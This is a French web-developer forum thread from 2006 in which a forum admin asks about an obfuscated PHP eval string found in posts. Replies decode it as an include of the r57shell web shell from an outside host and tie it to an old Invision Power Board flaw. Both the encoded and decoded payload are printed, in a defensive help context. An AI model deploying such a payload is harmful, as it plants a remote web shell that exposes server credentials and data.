+- JeuWeb - Crée ton jeu par navigateur (https://jeuweb.org)
+-- Forum : Discussions, Aide, Ressources... (https://jeuweb.org/forumdisplay.php?fid=38)
+--- Forum : Programmation, infrastructure (https://jeuweb.org/forumdisplay.php?fid=51)
+--- Sujet : [RESOLU] Piratage par eval (/showthread.php?tid=121)
Pages :
1
2
[RESOLU] Piratage par eval - Enyrian - 29-08-2006
Citation :eval( chr(105). chr(110). chr(99). chr(108). chr(117). chr(100). chr(101). chr(32). chr(34). chr(104). chr(116). chr(116). chr(112). chr(58). chr(47). chr(47). chr(114). chr(115). chr(116). chr(46). chr(118). chr(111). chr(105). chr(100). chr(46). chr(114). chr(117). chr(47). chr(100). chr(111). chr(119). chr(110). chr(108). chr(111). chr(97). chr(100). chr(47). chr(114). chr(53). chr(55). chr(115). chr(104). chr(101). chr(108). chr(108). chr(46). chr(116). chr(120). chr(116). chr(34). chr(59). chr(47). chr(42). chr(32) ); //
Dans mon forum, je me suis à deux topics de ça ...
Si quelqu'un sait ce que c'ets qu'il me dise, par ce que je soupçonne une tentative de piratage mais on sait jamais ...
RE: Piratage par eval - Loetheri - 29-08-2006
Oui, c'est exactement ça. Si tes pages fonctionnenent normallement, il n'y a pas de problème.
Sinon voilà ce que ça fait : include "http://rst.void.ru/download/r57shell.txt";/*
Ce genre d'attaque (qui n'a rien de professionel et rien d'hyper remarquable car n'importe qui sait le faire) devient relativement fréquent.
RE: Piratage par eval - Isenduil - 29-08-2006
Petite recherche et les résultats sont pour le moins intéressants :
source
D'après ce "tutorial", ton utilisateur a usé d'une faille d'Invasion Power Board 2.1.5 qui a été résolue depuis et protégée sur nombre de scripts de forums.
Si j'ai bien suivi, au final des instructions (aujourd'hui dépassées donc et c'est pour cela que l'auteur se permet de les écrire - il le précise en fin de document), l'utilisateur devait être à même d'exécuter un script de sa confection, de se nommer administrateur de ton forum ou d'obtenir des informations sur ses utilisateurs.
En bref : un membre à exclure de toute urgence et une ip à bannir...
Bonne chance
RE: Piratage par eval - Enyrian - 29-08-2006
Merci beaucoup
Ca va etre sa fete :nonon:
RE: [RESOLU] Piratage par eval - Loetheri - 29-08-2006
J'ai exécuté le script chez moi.
Ce script n'a plus au moins aucun rapport avec IPB. Il en use une faille ^^
J'ai vu apparaitre mes identifiants à ma BD, ainsi que d'autres informations fragiles. C'est un script assez puissant et dont il faut se méfier.
RE: [RESOLU] Piratage par eval - Plume - 29-08-2006
Sauf que je pense qu'à l'heure actuelle, si tout le monde sait faire ça, les forums, surtout IPB, ne sont plus vulnérables à ce genre de bétises...
RE: [RESOLU] Piratage par eval - Enyrian - 29-08-2006
Sur mon forum non mis à jour, on voit rien, donc je sais pas ... mais le type à été banni : un belge (non non, je suis pas anti belge ^^)
RE: [RESOLU] Piratage par eval - Loetheri - 29-08-2006
La chose que je voulais préciser, c'est que le mec il s'en fout de ton forum. C'est le serveur qui est intéressant
RE: [RESOLU] Piratage par eval - Isenduil - 30-08-2006
Citation :un belge (non non, je suis pas anti belge 34)
Sert à quoi de le préciser alors ?
iffle: (oui, oui je protège la réputation de mon pays )@ Damen :
Citation :D'après ce "tutorial", ton utilisateur a usé d'une faille d'Invasion Power Board 2.1.5 qui a été résolue depuis et protégée sur nombre de scripts de forums.
D'après ce que j'ai compris du lien cité dans le message en question...
RE: [RESOLU] Piratage par eval - Enyrian - 30-08-2006
Isenduil a écrit :Citation :un belge (non non, je suis pas anti belge 34)
Sert à quoi de le préciser alors ?
Je disais ça parce que si j'avais dit "c'est un belge" tout le monde aurait cru que je parlais de généralités, donc on aurait pensé que j'étais anti-belge ^^
Les deux membres ont été bannis, leurs IP aussi
Mais on change bientôt de forum pour un perso, donc ça devrait plus se reproduire
Merci à vous,
Enyrian